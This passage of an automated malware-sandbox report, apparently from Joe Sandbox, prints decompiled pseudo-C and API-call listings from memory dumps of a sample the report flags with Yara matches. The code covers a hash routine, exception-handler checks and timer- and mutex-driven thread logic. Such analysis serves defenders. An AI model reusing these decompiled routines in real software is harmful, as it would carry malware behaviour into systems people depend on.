                                          				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                          				asm("ror edi, 0xb");
                                          				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                          				asm("rol eax, 0x6");
                                          				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                          				asm("rol edx, 0xa");
                                          				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                          				_t400 = _a4;
                                          				asm("rol esi, 0xf");
                                          				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                          				 *_t400 =  *_t400 + _t259;
                                          				asm("ror eax, 0xb");
                                          				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                          				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                          				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                          				return memset( &_v76, 0, 0x40);
                                          			}
                                          0x0489198d
                                          0x04891998
                                          0x0489199b
                                          0x0489199e
                                          0x0489199f
                                          0x048919bd
                                          0x048919bf
                                          0x048919c2
                                          0x048919c5
                                          0x048919c5
                                          0x048919c8
                                          0x048919c8
                                          0x048919cb
                                          0x048919cb
                                          0x048919ce
                                          0x048919ce
                                          0x048919eb
                                          0x048919ee
                                          0x04891a04
                                          0x04891a07
                                          0x04891a21
                                          0x04891a24
                                          0x04891a3a
                                          0x04891a3d
                                          0x04891a3f
                                          0x04891a57
                                          0x04891a5a
                                          0x04891a5d
                                          0x04891a75
                                          0x04891a78
                                          0x04891a92
                                          0x04891a95
                                          0x04891aab
                                          0x04891aae
                                          0x04891ab0
                                          0x04891ac8
                                          0x04891acd
                                          0x04891ad0
                                          0x04891ae6
                                          0x04891ae9
                                          0x04891b03
                                          0x04891b06
                                          0x04891b1c
                                          0x04891b1f
                                          0x04891b21
                                          0x04891b3c
                                          0x04891b3f
                                          0x04891b56
                                          0x04891b59
                                          0x04891b5d
                                          0x04891b76
                                          0x04891b79
                                          0x04891b7b
                                          0x04891b7e
                                          0x04891b99
                                          0x04891b9c
                                          0x04891bb5
                                          0x04891bb8
                                          0x04891bc8
                                          0x04891bcb
                                          0x04891be3
                                          0x04891be6
                                          0x04891c00
                                          0x04891c03
                                          0x04891c1b
                                          0x04891c1e
                                          0x04891c34
                                          0x04891c37
                                          0x04891c4f
                                          0x04891c52
                                          0x04891c6a
                                          0x04891c6d
                                          0x04891c87
                                          0x04891c8a
                                          0x04891ca0
                                          0x04891ca3
                                          0x04891cbb
                                          0x04891cbe
                                          0x04891cd8
                                          0x04891cdb
                                          0x04891cf3
                                          0x04891cf6
                                          0x04891d0c
                                          0x04891d0f
                                          0x04891d27
                                          0x04891d2a
                                          0x04891d42
                                          0x04891d45
                                          0x04891d57
                                          0x04891d5a
                                          0x04891d6c
                                          0x04891d6f
                                          0x04891d81
                                          0x04891d84
                                          0x04891d88
                                          0x04891d98
                                          0x04891d9b
                                          0x04891da9
                                          0x04891dac
                                          0x04891dbe
                                          0x04891dc1
                                          0x04891dd5
                                          0x04891dd8
                                          0x04891dda
                                          0x04891dea
                                          0x04891ded
                                          0x04891dff
                                          0x04891e02
                                          0x04891e10
                                          0x04891e13
                                          0x04891e25
                                          0x04891e28
                                          0x04891e2c
                                          0x04891e3c
                                          0x04891e3f
                                          0x04891e51
                                          0x04891e54
                                          0x04891e62
                                          0x04891e65
                                          0x04891e77
                                          0x04891e7a
                                          0x04891e8c
                                          0x04891e8f
                                          0x04891ea3
                                          0x04891ea6
                                          0x04891eba
                                          0x04891ebd
                                          0x04891ed1
                                          0x04891ed4
                                          0x04891ee8
                                          0x04891eeb
                                          0x04891eff
                                          0x04891f02
                                          0x04891f16
                                          0x04891f1b
                                          0x04891f2d
                                          0x04891f30
                                          0x04891f44
                                          0x04891f47
                                          0x04891f5b
                                          0x04891f5e
                                          0x04891f74
                                          0x04891f77
                                          0x04891f8b
                                          0x04891f8e
                                          0x04891fa0
                                          0x04891fa3
                                          0x04891fb7
                                          0x04891fba
                                          0x04891fce
                                          0x04891fd1
                                          0x04891fe5
                                          0x04891fee
                                          0x04891ff1
                                          0x04891ffa
                                          0x04892003
                                          0x0489200b
                                          0x04892013
                                          0x0489201d
                                          0x04892032

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                          • Instruction ID: bab81b52cba49c7c0c518b56af131754d907419d87475fc640d46aad67e96c8a
                                          • Opcode Fuzzy Hash: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                          • Instruction Fuzzy Hash: C322847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: fc750f3eb89d9d2a8a86cca6900e87b20db082a145dca28283854832f4a92147
                                          • Instruction ID: b5268fd4764d0c73c14be37e436c4059a92a50d34335498df5721ade8393ab39
                                          • Opcode Fuzzy Hash: fc750f3eb89d9d2a8a86cca6900e87b20db082a145dca28283854832f4a92147
                                          • Instruction Fuzzy Hash: 0A22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: 1a29ac540e9644a6179586f1b150195bbc18a27d224edc75593619937bb5069c
                                          • Instruction ID: fe27e7d40974c9bb21376b6cfbfb614ed2180c720955ec721d592d394e463a95
                                          • Opcode Fuzzy Hash: 1a29ac540e9644a6179586f1b150195bbc18a27d224edc75593619937bb5069c
                                          • Instruction Fuzzy Hash: A542AD30A10B45CFCB25CF69C4906AAF7F1FF49304F54C9AED4AAAB651D334A986CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04898441(long _a4) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				short* _v32;
                                          				void _v36;
                                          				void* _t57;
                                          				signed int _t58;
                                          				signed int _t61;
                                          				signed int _t62;
                                          				void* _t63;
                                          				signed int* _t68;
                                          				intOrPtr* _t69;
                                          				intOrPtr* _t71;
                                          				intOrPtr _t72;
                                          				intOrPtr _t75;
                                          				void* _t76;
                                          				signed int _t77;
                                          				void* _t78;
                                          				void _t80;
                                          				signed int _t81;
                                          				signed int _t84;
                                          				signed int _t86;
                                          				short* _t87;
                                          				void* _t89;
                                          				signed int* _t90;
                                          				long _t91;
                                          				signed int _t93;
                                          				signed int _t94;
                                          				signed int _t100;
                                          				signed int _t102;
                                          				void* _t104;
                                          				long _t108;
                                          				signed int _t110;
                                          
                                          				_t108 = _a4;
                                          				_t76 =  *(_t108 + 8);
                                          				if((_t76 & 0x00000003) != 0) {
                                          					L3:
                                          					return 0;
                                          				}
                                          				_a4 =  *[fs:0x4];
                                          				_v8 =  *[fs:0x8];
                                          				if(_t76 < _v8 || _t76 >= _a4) {
                                          					_t102 =  *(_t108 + 0xc);
                                          					__eflags = _t102 - 0xffffffff;
                                          					if(_t102 != 0xffffffff) {
                                          						_t91 = 0;
                                          						__eflags = 0;
                                          						_a4 = 0;
                                          						_t57 = _t76;
                                          						do {
                                          							_t80 =  *_t57;
                                          							__eflags = _t80 - 0xffffffff;
                                          							if(_t80 == 0xffffffff) {
                                          								goto L9;
                                          							}
                                          							__eflags = _t80 - _t91;
                                          							if(_t80 >= _t91) {
                                          								L20:
                                          								_t63 = 0;
                                          								L60:
                                          								return _t63;
                                          							}
                                          							L9:
                                          							__eflags =  *(_t57 + 4);
                                          							if( *(_t57 + 4) != 0) {
                                          								_t12 =  &_a4;
                                          								 *_t12 = _a4 + 1;
                                          								__eflags =  *_t12;
                                          							}
                                          							_t91 = _t91 + 1;
                                          							_t57 = _t57 + 0xc;
                                          							__eflags = _t91 - _t102;
                                          						} while (_t91 <= _t102);
                                          						__eflags = _a4;
                                          						if(_a4 == 0) {
                                          							L15:
                                          							_t81 =  *0x489a380; // 0x0
                                          							_t110 = _t76 & 0xfffff000;
                                          							_t58 = 0;
                                          							__eflags = _t81;
                                          							if(_t81 <= 0) {
                                          								L18:
                                          								_t104 = _t102 | 0xffffffff;
                                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                          								__eflags = _t61;
                                          								if(_t61 < 0) {
                                          									_t62 = 0;
                                          									__eflags = 0;
                                          								} else {
                                          									_t62 = _a4;
                                          								}
                                          								__eflags = _t62;
                                          								if(_t62 == 0) {
                                          									L59:
                                          									_t63 = _t104;
                                          									goto L60;
                                          								} else {
                                          									__eflags = _v12 - 0x1000000;
                                          									if(_v12 != 0x1000000) {
                                          										goto L59;
                                          									}
                                          									__eflags = _v16 & 0x000000cc;
                                          									if((_v16 & 0x000000cc) == 0) {
                                          										L46:
                                          										_t63 = 1;
                                          										 *0x489a3c8 = 1;
                                          										__eflags =  *0x489a3c8;
                                          										if( *0x489a3c8 != 0) {
                                          											goto L60;
                                          										}
                                          										_t84 =  *0x489a380; // 0x0
                                          										__eflags = _t84;
                                          										_t93 = _t84;
                                          										if(_t84 <= 0) {
                                          											L51:
                                          											__eflags = _t93;
                                          											if(_t93 != 0) {
                                          												L58:
                                          												 *0x489a3c8 = 0;
                                          												goto L5;
                                          											}
                                          											_t77 = 0xf;
                                          											__eflags = _t84 - _t77;
                                          											if(_t84 <= _t77) {
                                          												_t77 = _t84;
                                          											}
                                          											_t94 = 0;
                                          											__eflags = _t77;
                                          											if(_t77 < 0) {
                                          												L56:
                                          												__eflags = _t84 - 0x10;
                                          												if(_t84 < 0x10) {
                                          													_t86 = _t84 + 1;
                                          													__eflags = _t86;
                                          													 *0x489a380 = _t86;
                                          												}
                                          												goto L58;
                                          											} else {
                                          												do {
                                          													_t68 = 0x489a388 + _t94 * 4;
                                          													_t94 = _t94 + 1;
                                          													__eflags = _t94 - _t77;
                                          													 *_t68 = _t110;
                                          													_t110 =  *_t68;
                                          												} while (_t94 <= _t77);
                                          												goto L56;
                                          											}
                                          										}
                                          										_t69 = 0x489a384 + _t84 * 4;
                                          										while(1) {
                                          											__eflags =  *_t69 - _t110;
                                          											if( *_t69 == _t110) {
                                          												goto L51;
                                          											}
                                          											_t93 = _t93 - 1;
                                          											_t69 = _t69 - 4;
                                          											__eflags = _t93;
                                          											if(_t93 > 0) {
                                          												continue;
                                          											}
                                          											goto L51;
                                          										}
                                          										goto L51;
                                          									}
                                          									_t87 = _v32;
                                          									__eflags =  *_t87 - 0x5a4d;
                                          									if( *_t87 != 0x5a4d) {
                                          										goto L59;
                                          									}
                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                          									__eflags =  *_t71 - 0x4550;
                                          									if( *_t71 != 0x4550) {
                                          										goto L59;
                                          									}
                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                          										goto L59;
                                          									}
                                          									_t78 = _t76 - _t87;
                                          									__eflags =  *((short*)(_t71 + 6));
                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                          										goto L59;
                                          									}
                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                          									__eflags = _t78 - _t72;
                                          									if(_t78 < _t72) {
                                          										goto L46;
                                          									}
                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                          										goto L46;
                                          									}
                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                          										goto L20;
                                          									}
                                          									goto L46;
                                          								}
                                          							} else {
                                          								goto L16;
                                          							}
                                          							while(1) {
                                          								L16:
                                          								__eflags =  *((intOrPtr*)(0x489a388 + _t58 * 4)) - _t110;
                                          								if( *((intOrPtr*)(0x489a388 + _t58 * 4)) == _t110) {
                                          									break;
                                          								}
                                          								_t58 = _t58 + 1;
                                          								__eflags = _t58 - _t81;
                                          								if(_t58 < _t81) {
                                          									continue;
                                          								}
                                          								goto L18;
                                          							}
                                          							__eflags = _t58;
                                          							if(_t58 <= 0) {
                                          								goto L5;
                                          							}
                                          							 *0x489a3c8 = 1;
                                          							__eflags =  *0x489a3c8;
                                          							if( *0x489a3c8 != 0) {
                                          								goto L5;
                                          							}
                                          							__eflags =  *((intOrPtr*)(0x489a388 + _t58 * 4)) - _t110;
                                          							if( *((intOrPtr*)(0x489a388 + _t58 * 4)) == _t110) {
                                          								L32:
                                          								_t100 = 0;
                                          								__eflags = _t58;
                                          								if(_t58 < 0) {
                                          									L34:
                                          									 *0x489a3c8 = 0;
                                          									goto L5;
                                          								} else {
                                          									goto L33;
                                          								}
                                          								do {
                                          									L33:
                                          									_t90 = 0x489a388 + _t100 * 4;
                                          									_t100 = _t100 + 1;
                                          									__eflags = _t100 - _t58;
                                          									 *_t90 = _t110;
                                          									_t110 =  *_t90;
                                          								} while (_t100 <= _t58);
                                          								goto L34;
                                          							}
                                          							_t25 = _t81 - 1; // -1
                                          							_t58 = _t25;
                                          							__eflags = _t58;
                                          							if(_t58 < 0) {
                                          								L28:
                                          								__eflags = _t81 - 0x10;
                                          								if(_t81 < 0x10) {
                                          									_t81 = _t81 + 1;
                                          									__eflags = _t81;
                                          									 *0x489a380 = _t81;
                                          								}
                                          								_t28 = _t81 - 1; // 0x0
                                          								_t58 = _t28;
                                          								goto L32;
                                          							} else {
                                          								goto L25;
                                          							}
                                          							while(1) {
                                          								L25:
                                          								__eflags =  *((intOrPtr*)(0x489a388 + _t58 * 4)) - _t110;
                                          								if( *((intOrPtr*)(0x489a388 + _t58 * 4)) == _t110) {
                                          									break;
                                          								}
                                          								_t58 = _t58 - 1;
                                          								__eflags = _t58;
                                          								if(_t58 >= 0) {
                                          									continue;
                                          								}
                                          								break;
                                          							}
                                          							__eflags = _t58;
                                          							if(__eflags >= 0) {
                                          								if(__eflags == 0) {
                                          									goto L34;
                                          								}
                                          								goto L32;
                                          							}
                                          							goto L28;
                                          						}
                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                          						__eflags = _t75 - _v8;
                                          						if(_t75 < _v8) {
                                          							goto L20;
                                          						}
                                          						__eflags = _t75 - _t108;
                                          						if(_t75 >= _t108) {
                                          							goto L20;
                                          						}
                                          						goto L15;
                                          					}
                                          					L5:
                                          					_t63 = 1;
                                          					goto L60;
                                          				} else {
                                          					goto L3;
                                          				}
                                          			}

                                          APIs
                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 048984F2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: MemoryQueryVirtual
                                          • String ID:
                                          • API String ID: 2850889275-0
                                          • Opcode ID: d8a1045bf8af83dbd557458d8e232086c1b75a4936fa77f5bbcbc8bdfb05ffe1
                                          • Instruction ID: 00ff7855d906c4b1c3c42b4162144e73534b57bc9b43795cb2fbe660ca3aed2e
                                          • Opcode Fuzzy Hash: d8a1045bf8af83dbd557458d8e232086c1b75a4936fa77f5bbcbc8bdfb05ffe1
                                          • Instruction Fuzzy Hash: 0161A231620E479FDF69AF2CC89462933E1EB86358B2C8F29D846CB290E735FC45C640
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B648FB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcessUser
                                          • String ID:
                                          • API String ID: 2217836671-0
                                          • Opcode ID: 24362eacb678cdc53d59a5f7b7002c7097150aec38b1c8520e2b6a4607bbfb60
                                          • Instruction ID: 61e7b0a02cc992e6ba536632611654e40505827a5952b8a5d2bbda7edf283d40
                                          • Opcode Fuzzy Hash: 24362eacb678cdc53d59a5f7b7002c7097150aec38b1c8520e2b6a4607bbfb60
                                          • Instruction Fuzzy Hash: F311DF3210414ABFDF025F98DC05DEA7BA6FF0C368B454258FE1862120CB36C8B1AB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 00B529CA
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorStatus
                                          • String ID:
                                          • API String ID: 1596131371-0
                                          • Opcode ID: ab2cb456d871110efe8615efe5439c35eec03030712be19b4d40890afad3796b
                                          • Instruction ID: 4e8e719d7ca1e6a5eb24dd7c2b59ea44691f7134c19c29df825d2d055568baee
                                          • Opcode Fuzzy Hash: ab2cb456d871110efe8615efe5439c35eec03030712be19b4d40890afad3796b
                                          • Instruction Fuzzy Hash: 2FC012325052026BDF095754DC18A2A7A51EB50301F04481DB54982070CF309890D700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E0489821C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				void* __ebp;
                                          				signed int* _t43;
                                          				char _t44;
                                          				void* _t46;
                                          				void* _t49;
                                          				intOrPtr* _t53;
                                          				void* _t54;
                                          				void* _t55; /* declaration missing in decompiler output; receives _t54 before the E0489832C call */
                                          				void* _t65;
                                          				long _t66;
                                          				signed int* _t80;
                                          				signed int* _t82;
                                          				void* _t84;
                                          				signed int _t86;
                                          				void* _t89;
                                          				void* _t95;
                                          				void* _t96;
                                          				void* _t99;
                                          				void* _t106;
                                          
                                          				_t43 = _t84;
                                          				_t65 = __ebx + 2;
                                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                          				_t89 = _t95;
                                          				_t96 = _t95 - 8;
                                          				_push(_t65);
                                          				_push(_t84);
                                          				_push(_t89);
                                          				asm("cld");
                                          				_t66 = _a8;
                                          				_t44 = _a4;
                                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                          					_push(_t89);
                                          					E04898387(_t66 + 0x10, _t66, 0xffffffff);
                                          					_t46 = 1;
                                          				} else {
                                          					_v12 = _t44;
                                          					_v8 = _a12;
                                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                          					_t86 =  *(_t66 + 0xc);
                                          					_t80 =  *(_t66 + 8);
                                          					_t49 = E04898441(_t66);
                                          					_t99 = _t96 + 4;
                                          					if(_t49 == 0) {
                                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                          						goto L11;
                                          					} else {
                                          						while(_t86 != 0xffffffff) {
                                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                          							if(_t53 == 0) {
                                          								L8:
                                          								_t80 =  *(_t66 + 8);
                                          								_t86 = _t80[_t86 + _t86 * 2];
                                          								continue;
                                          							} else {
                                          								_t54 =  *_t53();
                                          								_t89 = _t89;
                                          								_t86 = _t86;
                                          								_t66 = _a8;
                                          								_t55 = _t54;
                                          								_t106 = _t54;
                                          								if(_t106 == 0) {
                                          									goto L8;
                                          								} else {
                                          									if(_t106 < 0) {
                                          										_t46 = 0;
                                          									} else {
                                          										_t82 =  *(_t66 + 8);
                                          										E0489832C(_t55, _t66);
                                          										_t89 = _t66 + 0x10;
                                          										E04898387(_t89, _t66, 0);
                                          										_t99 = _t99 + 0xc;
                                          										E04898423(_t82[2]);
                                          										 *(_t66 + 0xc) =  *_t82;
                                          										_t66 = 0;
                                          										_t86 = 0;
                                          										 *(_t82[2])(1);
                                          										goto L8;
                                          									}
                                          								}
                                          							}
                                          							goto L13;
                                          						}
                                          						L11:
                                          						_t46 = 1;
                                          					}
                                          				}
                                          				L13:
                                          				return _t46;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                          • Instruction ID: facd1ab3e31aaab51a249cc91ad4254fa219871237396eff3869b6048a3b4b21
                                          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                          • Instruction Fuzzy Hash: 8121C732910A059FDB14EFA8C8808A7BBE5BF46310F498668D915DB245D730FD15CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                          • Instruction ID: 8a5fb5d08230cb74dca53982b1553cfec7c5973563d57fa4861328061086a04c
                                          • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                          • Instruction Fuzzy Hash: 8721B6729002059FDB10DF68CCC196BBBE5FF44750B05C1A8E96A9B245EB30FA15DBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B6B138: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B6B16C
                                            • Part of subcall function 00B6B138: GetLastError.KERNEL32 ref: 00B6B22D
                                            • Part of subcall function 00B6B138: ReleaseMutex.KERNEL32(00000000), ref: 00B6B236
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B71DA2
                                            • Part of subcall function 00B547FF: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00B54819
                                            • Part of subcall function 00B547FF: CreateWaitableTimerA.KERNEL32(00B79208,?,?), ref: 00B54836
                                            • Part of subcall function 00B547FF: GetLastError.KERNEL32(?,?), ref: 00B54847
                                            • Part of subcall function 00B547FF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 00B54887
                                            • Part of subcall function 00B547FF: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 00B548A6
                                            • Part of subcall function 00B547FF: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 00B548BC
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B71E05
                                          • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000), ref: 00B71E81
                                          • StrTrimA.SHLWAPI(00000000,?), ref: 00B71EA3
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B71EE3
                                            • Part of subcall function 00B6EBC8: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 00B6EBEA
                                            • Part of subcall function 00B6EBC8: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?), ref: 00B6EC18
                                          • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 00B71F89
                                          • CloseHandle.KERNEL32(?), ref: 00B72218
                                            • Part of subcall function 00B62D5C: WaitForSingleObject.KERNEL32(?,00000000), ref: 00B62D68
                                            • Part of subcall function 00B62D5C: HeapFree.KERNEL32(00000000,?,?), ref: 00B62D96
                                            • Part of subcall function 00B62D5C: ResetEvent.KERNEL32(?,?), ref: 00B62DB0
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B71FBE
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B71FCD
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00B71FFA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00B72014
                                          • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 00B7205C
                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 00B72076
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B7208C
                                          • ReleaseMutex.KERNEL32(?), ref: 00B720A9
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B720BA
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B720C9
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00B720FD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00B72117
                                          • SwitchToThread.KERNEL32 ref: 00B72119
                                          • ReleaseMutex.KERNEL32(?), ref: 00B72123
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B72161
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B7216C
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00B7218F
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00B721A9
                                          • SwitchToThread.KERNEL32 ref: 00B721AB
                                          • ReleaseMutex.KERNEL32(?), ref: 00B721B5
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B721CA
                                          • CloseHandle.KERNEL32(?), ref: 00B7222C
                                          • CloseHandle.KERNEL32(?), ref: 00B72238
                                          • CloseHandle.KERNEL32(?), ref: 00B72244
                                          • CloseHandle.KERNEL32(?), ref: 00B72250
                                          • CloseHandle.KERNEL32(?), ref: 00B7225C
                                          • CloseHandle.KERNEL32(?), ref: 00B72268
                                          • CloseHandle.KERNEL32(?), ref: 00B72274
                                          • RtlExitUserThread.NTDLL(00000000), ref: 00B72283
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                                          • String ID:
                                          • API String ID: 2369282788-0
                                          • Opcode ID: a6b0af2f6c4c83abb9dfe23dfa048024f9ebc4e543184c6859b22096e726aaf0
